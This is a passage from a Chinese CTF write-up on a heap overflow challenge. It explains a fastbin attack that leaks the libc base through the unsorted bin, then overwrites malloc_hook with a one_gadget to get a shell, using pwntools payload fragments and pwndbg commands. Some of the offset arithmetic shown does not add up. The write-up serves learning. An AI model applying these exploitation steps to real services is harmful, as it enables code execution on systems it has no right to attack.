<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">return</span> sub_11B2(*(_QWORD *)(<span class="number">24LL</span> * v2 + a1 + <span class="number">16</span>), v3);</span><br></pre></td></tr></table></figure>

<p>​    这里出现了一个新的函数(我将它重新命名为<code>ensure_read</code>)，参数1就是我们指向堆块首地址的指针，参数2就是我们即将要输出content的长度。让我们点进去这个函数看看它干了什么：</p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230505/c2yb8erimage.2mc1fxxua500.png"></p>
<p>​    <strong>一言概之，这个函数就是保证我们能够输入我们要求大小的content.</strong>    </p>
<h4 id="Free函数"><a href="#Free函数" class="headerlink" title="Free函数"></a>Free函数</h4><p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230505/c2yb8erimage.3233e6pcm6m0.png"></p>
<p>​    当你把Allocate函数分析弄明白后，Free函数的机制你就应该能够轻松掌握。</p>
<p>​    首先判断我们要释放的堆块是否是被分配过的，然后修改标志和大小，最后将指向堆块的指针设置为<code>NULL</code>。</p>
<p>​    这里的free函数做的比较规范，所以不存在<code>UAF漏洞</code>。</p>
<h4 id="Dump函数"><a href="#Dump函数" class="headerlink" title="Dump函数"></a>Dump函数</h4><p><img lazyload alt="image" data-src="/home/c2yb8er/Typora/images/image-20230505225935108.png"></p>
<p>​    同理先判断传入的指针所对应的堆块状态，然后我们发现了又一个新函数，参数1为堆块指针，参数2为堆块大小。现在我们点进去看看这个函数做了什么：</p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230505/c2yb8erimage.6a1a1c50mhs0.png"></p>
<p>​    与前面的<code>ensure_read函数</code>如出一辙，只不过是read改为write，故不多解释了。</p>
<h3 id="1-漏洞成因："><a href="#1-漏洞成因：" class="headerlink" title="1.漏洞成因："></a>1.漏洞成因：</h3><p>​    在详细分析整个程序流程后，这个程序的漏洞点在哪里呢？</p>
<p>​    比较显然的堆溢出漏洞。虽然在Allocate函数中对size有所限制，但是在Fill函数中却没有对size有所限制。</p>
<h3 id="2-思路："><a href="#2-思路：" class="headerlink" title="2.思路："></a>2.思路：</h3><ol>
<li><p>先分配5个堆块：0x10，0x10，0x10，0x10，0x80。</p>
<p>分别记为chunk1,chunk2,chunk3,chunk4,chunk5。下标分别为[0,1,2,3,4]</p>
</li>
<li><p>free掉chunk3和chunk2</p>
</li>
<li><p>这个时候的fastbin：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">先free(2)再free(1)</span></span><br><span class="line">fastbin:</span><br><span class="line">0x20:chunk2-------&gt;chunk3--------&gt;0</span><br></pre></td></tr></table></figure></li>
<li><p>我们需要泄露基地值，泄露基地值的方法就是找main_arena,如何找到main_arena呢？通过unsorted bins来找到。当我们把chunk5释放出去后，chunk5就会指向unsorted bins中的地址，而unsorted bin的地址与main_arena的地址偏移是固定的，这里我们将通过堆溢出来实现通过其他chunk也就是chunk2偷天换日也指向chunk5从而获取main_arena泄露基地址。(至于为什么是chunk2，我们等一下再说)</p>
<p>堆块区域大致如下：</p>
</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">------------------------------------------</span><br><span class="line">pre | size  </span><br><span class="line">fd  | bk	 &lt;---chunk1</span><br><span class="line">content</span><br><span class="line">------------------------------------------</span><br><span class="line">pre | size  </span><br><span class="line">fd  | bk	 &lt;---chunk2（free）</span><br><span class="line">content</span><br><span class="line">------------------------------------------</span><br><span class="line">pre | size  </span><br><span class="line">fd  | bk	 &lt;---chunk3（free）</span><br><span class="line">content</span><br><span class="line">------------------------------------------</span><br><span class="line">pre | size  </span><br><span class="line">fd  | bk	 &lt;---chunk4</span><br><span class="line">content</span><br><span class="line">------------------------------------------</span><br><span class="line">pre | size </span><br><span class="line">fd  | bk	 &lt;---chunk5</span><br><span class="line">content</span><br><span class="line">------------------------------------------</span><br><span class="line">top chunk</span><br></pre></td></tr></table></figure>

<ol start="5">
<li><p>这里实现起来先要将chunk2利用起来，由于Fill函数会检查堆块是否还在使用，所以要修改chunk2或者chunk3，就必须通过还在使用的chunk1。由于chunk2与chunk1临近，修改起来比较方便故这里利用堆溢出修改chunk2使得其fd指向chunk5。这样我们在释放chunk5之后就有了可以利用chunk5的媒介了。</p>
</li>
<li><p>但是这里不能直接释放chunk5，因为此时的chunk5的大小为0x90，已经超过了fast bin的最大接收范围，同样的道理，我们通过还在使用的chunk4来修改chunk5的大小为0x20，从而能使其进入fast bin的0x20这条链进行利用。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">fastbin:</span><br><span class="line">0x20:chunk2----&gt;chunk5</span><br></pre></td></tr></table></figure></li>
<li><p>开始利用fast bin的0x20这条链，重新申请两个0x20大小的chunk。重启后原本chunk2部分正常重启chunk2，但是原本chunk3部分却是指向了chunk5。</p>
</li>
<li><p>现在chunk5的大小被修改成为了0x20，如果被释放将不满足进入unsorted bin的条件，所以得把大小改回来。</p>
</li>
<li><p>改回来之后，还是不能马上释放chunk5，因为我们发现chunk5现在紧邻top_chunk，如果直接释放将会和top chunk合并而不是进入unsorted bin中，为此我们还得再申请一个chunk6。这个chunk6的大小为多少不影响。</p>
</li>
<li><p>释放chunk5，此时chunk3等效于chunk5，去掉偏移后，我们就可以得到main_arena的地址，然后计算基地址，利用one_gadget。</p>
</li>
<li><p>还是得狠狠地榨干chunk5的利用价值，我们再重新申请一块0x70大小的chunk，此时的chunk7会出现在原来的chunk5也就是id=4的位置，还记得我们的chunk3吗？chunk3是可以控制能够chunk5这块地址的，所以我们如果把chunk7再释放了，就可以通过chunk3修改chunk7。</p>
</li>
<li><p>通过chunk3修改chunk7，将其fd指向一个我们伪造的fake chunk。这个chunk7是我们精心选择的，此时在fastbin：0x70这条链子上我们就能发现：</p>
</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">fastbin：</span><br><span class="line">0x70: chunk7---------&gt;fake_chunk</span><br></pre></td></tr></table></figure>

<ol start="13">
<li><p>此时再申请两个0x70大小的chunk将启用chunk7和fake_chunk!</p>
<p>我们再来看一下现在的chunk情况：</p>
</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">------------------------------------------</span><br><span class="line">pre | size  </span><br><span class="line">fd  | bk	 &lt;---chunk1</span><br><span class="line">content</span><br><span class="line">------------------------------------------</span><br><span class="line">pre | size  </span><br><span class="line">fd  | bk	 &lt;---chunk2（reuse:chunk2）</span><br><span class="line">content</span><br><span class="line">------------------------------------------</span><br><span class="line">pre | size  </span><br><span class="line">fd  | bk	 &lt;---chunk3（reuse:chunk5）</span><br><span class="line">content</span><br><span class="line">------------------------------------------</span><br><span class="line">pre | size  </span><br><span class="line">fd  | bk	 &lt;---chunk4</span><br><span class="line">content</span><br><span class="line">------------------------------------------</span><br><span class="line">pre | size </span><br><span class="line">fd  | bk	 &lt;---chunk5 (reuse:chunk7)</span><br><span class="line">content</span><br><span class="line">------------------------------------------</span><br><span class="line">pre | size </span><br><span class="line">fd  | bk	 &lt;---chunk6</span><br><span class="line">content</span><br><span class="line">------------------------------------------</span><br><span class="line">pre | size </span><br><span class="line">fd  | bk	 &lt;---fake_chunk</span><br><span class="line">content</span><br><span class="line">------------------------------------------</span><br><span class="line">top chunk</span><br></pre></td></tr></table></figure>

<ol start="14">
<li>由于如果成功将one_gadget地址写入到<code>malloc_hook</code>位置，那么当下一次调用<code>malloc</code>函数时，它将会尝试执行<code>malloc_hook</code>指向的地址，即one_gadget。所以我们现在的任务就是要将<code>malloc_hook</code>的地址处写上我们的one_gadget地址，由于fake chunk与malloc_hook的偏移是固定的所以这一点很容易做到！</li>
<li>申请任意大小的chunk，让执行malloc_hook所指向的地址也就是one_gadget，从而getshell！</li>
</ol>
<h3 id="3-流程："><a href="#3-流程：" class="headerlink" title="3.流程："></a>3.流程：</h3><h4 id="查看mmap函数分配地址及其内容："><a href="#查看mmap函数分配地址及其内容：" class="headerlink" title="查看mmap函数分配地址及其内容："></a>查看mmap函数分配地址及其内容：</h4><p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.2mdppaw8yu20.png"></p>
<p><img lazyload alt="image" data-src="/home/c2yb8er/Typora/images/image-20230506192524242.png"></p>
<h4 id="泄露unsortbin-addr地址"><a href="#泄露unsortbin-addr地址" class="headerlink" title="泄露unsortbin_addr地址"></a>泄露unsortbin_addr地址</h4><p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.6eukpsjy1f00.png"></p>
<pre><code> free过后：
</code></pre>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.2ve91pv3ktw0.png"></p>
<h5 id="修改chunk2的fd使得其指向为chunk5"><a href="#修改chunk2的fd使得其指向为chunk5" class="headerlink" title="修改chunk2的fd使得其指向为chunk5"></a>修改chunk2的fd使得其指向为chunk5</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Fill(0,b&#x27;a&#x27;*0x10 + p64(0) + p64(0x21) + p8(0x80))</span><br><span class="line"># 注意这里最后只覆盖低四位，故用p8()</span><br></pre></td></tr></table></figure>

<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.4fngitfvry80.png"></p>
<p>​    可以看到，已经修改成功：</p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.38kqz68rcga0.png"></p>
<blockquote>
<p>​    可以看到覆盖后fastbin中就变成了chunk2 –&gt; chunk5。那么接下来如果我们想要对chunk5进行操作的话，就需要重启fastbin中chunk2指向的chunk5，但是由于chunk5的size是0x90而不是0x20，所以即使chunk5的chunk指针在fastbin的0x20单项链表中我们也是无法启用的。所以我们还需要通过向chunk4中写溢出数据，使其覆盖chunk5的size为0x20，我们才能够重新启用chunk5。<br>————————————————<br>原文链接：<a class="link" target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41202237/article/details/112320919">https://blog.csdn.net/qq_41202237/article/details/112320919<i class="fas fa-external-link-alt"></i></a></p>
</blockquote>
<h5 id="修改chunk5的size大小，从而能够在fastbin-0x20这条链上操作："><a href="#修改chunk5的size大小，从而能够在fastbin-0x20这条链上操作：" class="headerlink" title="修改chunk5的size大小，从而能够在fastbin:0x20这条链上操作："></a>修改chunk5的size大小，从而能够在fastbin:0x20这条链上操作：</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Fill(3,p64(0)*3 + p64(0x21))</span><br></pre></td></tr></table></figure>

<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.2idd5zvcgoi0.png"></p>
<h5 id="操作fastbin-0x20这条链"><a href="#操作fastbin-0x20这条链" class="headerlink" title="操作fastbin:0x20这条链"></a>操作fastbin:0x20这条链</h5><blockquote>
<p>​    接下来我们只需要重新申请两个0x20大小的chunk，第一次申请0x20会重新启用fastbin中0x20单项链表尾部的chunk2，第二次申请0x20就会启用fastbin中0x20单向链表剩下的chunk5：</p>
</blockquote>
<p><img lazyload alt="image" data-src="/home/c2yb8er/Typora/images/image-20230506201759118.png"></p>
<blockquote>
<p>​    上述做了这么多的准备工作。我们想要的其实就是让id为2的结构体的第三成员变量指向chunk5，因为无论是打印还是填充数据，都是根据结构体第三成员变量找到的chunk。这样一来，我们接下来对id为2的chunk5进行操作，就等同与对id为4的chunk5进行操作。</p>
<p>​    前面说更改chunk5的size是为了重新启用它，但是一开始之所以将chunk5的size定义为0x90，是为了接下来释放chunk5的时候进unsortbin能让chunk5的fd指向unsortbin_addr。所以接下来我们还需要构建payload_for_chunk4对chunk4进行溢出，将chunk5的size改回0x90：</p>
</blockquote>
<h5 id="修改chunk5的size大小，从而能够在free后分配到unsorted-bin中："><a href="#修改chunk5的size大小，从而能够在free后分配到unsorted-bin中：" class="headerlink" title="修改chunk5的size大小，从而能够在free后分配到unsorted bin中："></a>修改chunk5的size大小，从而能够在free后分配到unsorted bin中：</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Fill(3,p64(0)*3 + p64(0x91))</span><br></pre></td></tr></table></figure>

<p>​    跟上述修改同理，就不贴图了。</p>
<h5 id="去除top-chunk对chunk5的影响"><a href="#去除top-chunk对chunk5的影响" class="headerlink" title="去除top_chunk对chunk5的影响:"></a>去除top_chunk对chunk5的影响:</h5><blockquote>
<p>​    可以看到经过对chunk4的溢出，chunk5的size重新改为0x90。但此时并不能直接进行去释放chunk5，<mark>因为只有不与top_chunk相邻的第一个释放chunk，其fd才会指向unsortbin_addr。</mark>chunk5现在是链接top_chunk的，所以我们还需要重新申请一个size为0x90大小的chunk之后再去释放chunk5：</p>
</blockquote>
<p>​    ————–》<strong> 疑问：可不可以不是0x90大小的chunk呢？</strong></p>
<p>​    经过尝试：可以，因为这个chunk只起分割chunk5与top chunk的作用后续将不做过多使用。故大小没有影响。</p>
<p>​    </p>
<h5 id="利用chunk5获取main-arena地址"><a href="#利用chunk5获取main-arena地址" class="headerlink" title="利用chunk5获取main_arena地址"></a>利用chunk5获取main_arena地址</h5><blockquote>
<p>​    接下来的操作就比较容易了，由于前面已经在id为2的结构体处部署了chunk5的chunk指针，所以接下来我们只需要调用程序中的dump()函数打印id为2的chunk内容，就可以把chunk5中的unsortbin_addr（fd）打印出来了！！！</p>
</blockquote>
<p>​    free掉chunk5后我们发现其指向了main_arena的地址：</p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.6u1n3c6zfos0.png"></p>
<p>​    我一开始还在疑惑为什么有两个泄露的基地址，仔细一看原来是此时chunk5的fd和bk都是泄露的(main_arena+88)</p>
<p><strong>—–&gt;在学完Unsorted bin后来看这一点，我发现是这里是理解错了，我当时没有理解好Unsorted bin中的结构是什么样子：双向链表！</strong></p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230507/c2yb8erimage.3f3vqau81o80.png"></p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.567xs1doqb40.png"></p>
<pre><code>然后就是正常的泄露基地址，但是要注意的是：
</code></pre>
<p>​    unsortbin_addr与main_arena之间的偏移是固定的88<br>​    main_arena与libc基地址的偏移是固定的0x3c4b20<br>​    这样一来我们就得到了libc的基地址</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">c.recvuntil(b&#x27;Content: \n&#x27;)</span><br><span class="line">main_arena_88_addr = u64(c.recv(6).ljust(8,b&#x27;\x00&#x27;))</span><br><span class="line">main_arena_addr = main_arena_88_addr - 88</span><br><span class="line">loghex(main_arena_addr,&#x27;The Leak Addr :&#x27;)</span><br><span class="line">libcbase = main_arena_addr - 0x3c4b20</span><br></pre></td></tr></table></figure>

<p>​    这里我参考的文章的作者用了这段代码来计算这个固定值88:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">#需要提前指定你的计算机架构</span><br><span class="line">def offset_bin_main_arena(idx):</span><br><span class="line">    word_bytes = context.word_size / 8</span><br><span class="line">    offset = 4  # lock</span><br><span class="line">    offset += 4  # flags</span><br><span class="line">    offset += word_bytes * 10  # offset fastbin</span><br><span class="line">    offset += word_bytes * 2  # top,last_remainder</span><br><span class="line">    offset += idx * 2 * word_bytes  # idx</span><br><span class="line">    offset -= word_bytes * 2  # bin overlap</span><br><span class="line">    return offset</span><br></pre></td></tr></table></figure>

<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.1dutgpb9amrk.png"></p>
<p>​    但是我不太明白为什么要这样做，为理解的这个88是我们在unsorted bin中那条chunk5指向的链中标出来的：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">all: 0x55d6f4207080 —▸ 0x7f1725bc4b78 (main_arena+88) ◂— 0x55d6f4207080</span><br></pre></td></tr></table></figure>

<p>​    这里是<code>(main_arena+88)</code>，如果要得到main_arena_addr就需要减去88。不知道我这样想对不对。</p>
<h4 id="Try-to-Getshell！"><a href="#Try-to-Getshell！" class="headerlink" title="Try to Getshell！"></a>Try to Getshell！</h4><p>​    </p>
<h5 id="new-一个chunk7"><a href="#new-一个chunk7" class="headerlink" title="new 一个chunk7"></a>new 一个chunk7</h5><blockquote>
<p>​    在得到libc基地址之后就是进行malloc_hook了,我们需要在malloc_hook附近寻找一个可用的fake_chunk，这个fake_chunk需要满足两点要：</p>
<p>​        size大小为0x70 - 0x7F之间（有利于用错字节找到fake_chunk）<br>​        fake_chunk的内容部分必须包含malloc_hook的地址（在填充fake_chunk内容的同时修改malloc_hook）</p>
</blockquote>
<p>———-&gt;为什么要对size进行这个约束？</p>
<blockquote>
<p>​    由于size的原因，我们需要先申请一个size为0x70的chunk7，并将其释放进fastbin的0x70单项链表。这里需要注意的的释放的目标，在泄露unsortbin_addr部分最后，我们释放了id为4的chunk5，从而泄露出unsortbin_addr。那么重新申请size为0x70的chunk7的时候，chunk7会放在id为4的位置，所以申请后再次释放的应该是id4：</p>
</blockquote>
<p><img lazyload alt="image" data-src="/home/c2yb8er/Typora/images/image-20230506210742518.png"></p>
<p>​    可以看出新分配是从被free的chunk5中重启用的。</p>
<p>​    再次释放：</p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.2k1tm4xko3s0.png"></p>
<h5 id="通过修改重启的chunk5来修改chunk7"><a href="#通过修改重启的chunk5来修改chunk7" class="headerlink" title="通过修改重启的chunk5来修改chunk7"></a>通过修改重启的chunk5来修改chunk7</h5><blockquote>
<p>​    这样一来我们就有承接fake_chunk的chunk7了，此时的chunk7的fd指针指向的是NULL。还记得前半部分在id为2的位置部署的chunk5吗，此时chunk7由于被放在了id为4原来chunk5的位置，chunk7的chunk地址与chunk5的地址指向的是同一个位置，所以对id为2的chunk5进行操作，也就相当于对chunk7进行操作。</p>
</blockquote>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.51xubemtcig0.png"></p>
<blockquote>
<p>​    所以我们只需要向id为2的chunk5中填充fake_chunk的地址，那么chunk7的fd位置就会被覆盖成fake_chunk!</p>
</blockquote>
<h5 id="寻找fake-chunk的方法："><a href="#寻找fake-chunk的方法：" class="headerlink" title="寻找fake_chunk的方法："></a>寻找fake_chunk的方法：</h5><p>​    首先在gdb中输入下方命令查找main_arena的地址：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">print (void*)&amp;main_arena</span><br></pre></td></tr></table></figure>

<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.5772ursy1cg.png"></p>
<p>​    可以看到当前流程中main_arena的地址为<code>0x7fe7fedc4b20</code>。看一下<code>main_arena - 0x10</code>位置的malloc_hook：</p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.6lyohplnqk00.png"></p>
<p>​    可以看到malloc_hook的地址为<code>0x7fe7fedc4b10</code>，那么接下来使用pwndbg中的<code>find_fake_fast</code>函数和查找一下可以将malloc_hook作为内容地址的<code>0x70（0x7F）</code>大小的fake_chunk，使用下面的命令:</p>
<p>​    <code>(find_fake_fast+被写入地址+chunk大小)</code>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find_fake_fast 0x7fe7fedc4b10 0x7f</span><br></pre></td></tr></table></figure>



<p><strong>———-&gt;为什么是<code>0x70（0x7F）</code>大小的fake_chunk呢？</strong></p>
<ul>
<li>size大小为0x70 - 0x7F之间（有利于用错字节找到fake_chunk）</li>
</ul>
<p>​    我没有太理解这里的<code>有利于用错字节找到fake_chunk</code>是什么意思，贴一个chat回答的内容：</p>
<p>​    (经典chat，说了感觉又没说，bushi)</p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.76ezsfchmo80.png"></p>
<p>​    可以看到pwndbg已经为我们找到了合适的fake_chunk：<code>0x7fe7fedc4aed</code>。</p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.3yjykrvrsvy0.png"></p>
<p><img lazyload alt="image" data-src="/home/c2yb8er/Typora/images/image-20230506213701686.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">fake_offset_main = main_arena - fake_chunk = 0x7fe7fedc4b20 - 0x7fe7fedc4b10 = 0x33</span><br><span class="line">fake_offset_hook = malloc_hook_addr - fake_chunk = 0x7fe7fedc4b10 - 0x7fe7fedc4b10 = 0x23</span><br></pre></td></tr></table></figure>



<h5 id="续接上文修改chunk7"><a href="#续接上文修改chunk7" class="headerlink" title="续接上文修改chunk7"></a>续接上文修改chunk7</h5><p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.2c0qd34wq3ms.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">fake_chunk_addr = main_arena_addr - 0x33 </span><br><span class="line">fake_chunk = p64(fake_chunk_addr)</span><br><span class="line">Fill(2,fake_chunk)</span><br></pre></td></tr></table></figure>

<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.14zzpmo4hk2k.png"></p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.2osyb6pm2mg0.png"></p>
<blockquote>
<p>​    可以看到既然fake_chunk已经被挂进fastbin了，所以我们只需要再次申请两个size为0x70大小的chunk。申请第一个0x70的chunk重启chunk7，申请第二个0x70的chunk将fake_chunk作为正常chunk启用：</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Allocate(0x60)</span><br><span class="line">Allocate(0x60)</span><br></pre></td></tr></table></figure>

<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.17s14q8hd2e8.png"></p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.69w261jg8ts0.png"></p>
<h5 id="控制fake-chunk，通过one-gadget从而getshell！"><a href="#控制fake-chunk，通过one-gadget从而getshell！" class="headerlink" title="控制fake_chunk，通过one_gadget从而getshell！"></a>控制fake_chunk，通过one_gadget从而getshell！</h5><blockquote>
<p>​    那么的到one_gadget了之后，就可以调用程序本身Fill()函数，向id为6的fake_chunk中的malloc_hook地址位置写one_gadget了。那么malloc_hook相对于fake_chunk的内容起始位置的偏移为0x13，所以构建payload_for_hook及交互代码：</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">one_gadget_addr = libcbase + 0x4526a</span><br><span class="line">payload = 0x13 * b&#x27;a&#x27; + p64(one_gadget_addr)</span><br><span class="line">Fill(6, payload)</span><br></pre></td></tr></table></figure>

<p>​    <strong>————-》<code>0x13</code>怎么得来的呢？</strong></p>
<p>​        根据前面的计算malloc_hook相对fake_chunk的偏移为<code>0x23</code>，也就是说去掉fake_chunk的prev_size和size，malloc_hook的起始位置相对于fake_chunk数据区域起始地址的偏移为<code>0x13</code>。</p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.1mxf8wyadw8w.png"></p>
<p><img lazyload alt="image" data-src="/home/c2yb8er/Typora/images/image-20230506231523491.png"></p>
<blockquote>
<p>​    这样一来，malloc_hook中就被安置好了，只需要调用程序中的allocate()函数创建任意大小的chunk，就可以触发one_gadget拿shell！！！</p>
</blockquote>
<p>​    我还没有完全搞懂修改malloc_hook的基理，上述整个流程虽然都理解了，但是较为生疏！多模多练！</p>
<blockquote>
<p>​    在这种情况下，如果成功将one_gadget地址写入到<code>malloc_hook</code>位置，那么当下一次调用<code>malloc</code>函数时，它将会尝试执行<code>malloc_hook</code>指向的地址，即one_gadget。</p>
<h3 id="malloc-hook："><a href="#malloc-hook：" class="headerlink" title="malloc_hook："></a>malloc_hook：</h3><p>​    位于 libc 中的函数指针变量，通常为 NULL，不为 NULL 时 malloc() 函数会优先调用该函数指针</p>
<p>​    在GNU C库（glibc）中，<code>malloc_hook</code>是一个指向用户定义的函数的指针，它允许用户在调用标准库函数<code>malloc</code>时进行自定义的操作。<code>malloc_hook</code>被定义为全局变量，其初始值为<code>NULL</code>。</p>
<p>​    当调用<code>malloc</code>函数时，glibc会先检查<code>malloc_hook</code>的值。如果<code>malloc_hook</code>不为<code>NULL</code>，则在执行实际的内存分配操作之前，会先调用<code>malloc_hook</code>指向的函数。这个函数可以被用户自定义，可以执行一些特定的操作，例如记录内存分配信息、添加额外的内存检查等。</p>
</blockquote>
<h5 id="不知道为什么远程通了，本地没通"><a href="#不知道为什么远程通了，本地没通" class="headerlink" title="不知道为什么远程通了，本地没通"></a>不知道为什么远程通了，本地没通</h5><p>​    本地照理说应该是可以打通的，但是system函数卡在了某个位置上：</p>
<p><img lazyload alt="image" data-src="/home/c2yb8er/Typora/images/image-20230506232256781.png"></p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230506/c2yb8erimage.69ypvhttvk40.png"></p>
<h1 id="Unsorted-Bin-Attack"><a href="#Unsorted-Bin-Attack" class="headerlink" title="Unsorted Bin Attack"></a>Unsorted Bin Attack</h1><blockquote>
<h3 id="Unsorted-Bin基本来源"><a href="#Unsorted-Bin基本来源" class="headerlink" title="Unsorted Bin基本来源"></a>Unsorted Bin基本来源</h3><ol>
<li>当一个较大的 chunk 被分割成两半后，如果剩下的部分大于 MINSIZE，就会被放到 unsorted bin 中。</li>
<li>释放一个不属于 fast bin 的 chunk，并且<strong>该 chunk 不和 top chunk 紧邻时</strong>，该 chunk 会被首先放到 unsorted bin 中。</li>
<li>当进行 malloc_consolidate 时，可能会把合并后的 chunk 放到 unsorted bin 中，如果不是和 top chunk 近邻的话。</li>
</ol>
<h3 id="Unsorted-Bin基本使用情况"><a href="#Unsorted-Bin基本使用情况" class="headerlink" title="Unsorted Bin基本使用情况"></a>Unsorted Bin基本使用情况</h3><ol>
<li><p>Unsorted Bin 在使用的过程中，采用的遍历顺序是 FIFO，<strong>即插入的时候插入到 unsorted bin 的头部，取出的时候从链表尾获取</strong>。</p>
</li>
